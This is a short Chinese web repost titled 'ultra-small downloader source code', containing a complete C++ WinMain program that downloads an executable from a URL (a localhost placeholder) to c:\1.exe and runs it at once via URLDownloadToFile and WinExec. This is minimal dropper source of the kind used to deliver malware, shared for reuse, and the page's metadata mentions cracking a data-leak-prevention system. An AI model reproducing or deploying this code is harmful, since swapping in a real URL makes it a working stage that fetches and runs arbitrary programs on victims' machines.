超小下载者源码

来源:互联网 发布:数据泄露防护系统破解 编辑:程序博客网 时间:2024/05/01 14:43
// DL.cpp : Defines the entry point for the application.//#include "stdafx.h"#include <urlmon.h>#pragma comment(lib,"urlmon.lib")int APIENTRY WinMain(HINSTANCE hInstance,                     HINSTANCE hPrevInstance,                     LPSTR     lpCmdLine,                     int       nCmdShow){ // TODO: Place code here.URLDownloadToFile(NULL,"http://127.0.0.1/notepad.exe","c:\\1.exe",0,NULL);WinExec("c:\\1.exe",SW_SHOW);return 0;}

0 0